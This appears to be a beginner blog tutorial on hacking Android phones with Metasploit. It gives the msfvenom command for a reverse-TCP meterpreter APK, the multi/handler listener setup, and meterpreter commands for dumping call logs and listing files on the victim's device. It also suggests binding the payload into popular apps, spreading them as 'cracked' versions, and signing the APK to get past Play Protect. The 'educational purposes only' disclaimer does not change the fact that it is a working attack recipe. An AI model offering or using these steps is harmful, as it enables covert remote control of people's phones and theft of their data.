How to hack any Android Device?
The Beginners Way
So basically, there are many ways to hack an android device and there are many types of malware that one can actually gain access to, and some of them are using spyware apps like spyzier[Github], and also one can actually bind some form of application code with some well-known apps and release apks online as cracked versions[Mods].
As a beginner, we will create a small apk[payload] and install this apk in our local network environment[i.e within in the wifi network] and we will also deal with basic usage of the powerful tool which can be used by cybercriminals as well as ethical hackers to probe systematic vulnerabilities on networks and servers known as Metasploit
- An Android Device
- Metasploit Framework[Preinstalled in Kali]
Step 1: Generate a payload
So there is an inbuilt payload generator within the framework itself so we will be using:
msfvenom –p android/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<Port Numbert> R > cybermight.apk
And in here we will be configuring the payload to connect back using the reverse TCP method as soon the victim installs and opens the installed apk we will be getting a command and control shell and for this, we need to configure a listener on the attacker machine LHOST and LPORT are the listener configurations and which actively listens for the incoming connections all the time, So before the victim clicks we need to be ready with our listener for the incoming connection.
-p: Specify Payload type [There are many available to create a reverse connection, but reverve_tcp is the most reliable and the famous payload]
• LHOST: Your Listener Address [i.e Attacker IP address]
• LPORT : Listening Port number [Some Random Port Number]
• R: RAW Format [apk format]
• ><filename>.apk [Location to save the payload]
Step 2: Configuring our listener
We will be using the Metasploit framework to listen for the incoming connections, so the command msfconsole starts the framework.
You can search for the payloads available for android in the Metasploit framework by typing in “search android”
Please type in the following command and we will explain this later
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set LHOST <ip address given> [set LHOST 192.168.1.5]
- set LPORT <port number given> [set LHOST 1906]
- show options
So multi/handler is an option that handles exploits launched outside of the framework. and the payload we used needs to be given to the set payload option and the configuration of LHOST and LPORT will start the listening by using them and show options will give you the summary of the options you configured and the exploit option is to start our listener right away
Step 3: Installation of payload
So I copied the apk manually and installed it on my own device.
You may face an error as shown below and you may also face an error stating that malicious activity or signature found and we will discuss later for now just click install anyway
And after installation, you may see an app called “Main Activity” in your home section
And as soon as you open the application you may see something like this and after allowing it, the app closes automatically and won't give or respond to your input
Step 4: Listener Session
But in the attacker machine, a reverse shell will be created where the attacker will have control over your device
And the help command will give you the options that you can actually perform gather some serious information from this CLI
- sysinfo : will dump all the architecture information of the device
- dump_calllog : will fetch all your call logs and saves them locally on the attacker PC
- ls: will list the files in the directory present on the android device
Blocked By Play Protect
So this is the point where one has to learn and bypass the detection and to bypass them we need to actually sign the apk and there are many tools to do this but I am leaving this to you, try to understand how and why it works. and also how to perform such type of attack outside the network?
So as discussed one can actually bind this payload into a well-known working application and host the apk online in the name of cracked versions. And this is a general and basic process that one can actually perform on windows, Linux, etc the process may vary, but the basic idea sticks on, the changes are like for a Windows machine you have to create a .exe payload, and Metasploit is a great tool and this can also be used to deliver some serious attacks on unpatched servers and you can actually automate the whole process we discussed here with some Github scripts like the FATRat and many more, but still learning how and why this works is a must.
Note: For Educational Purposes Only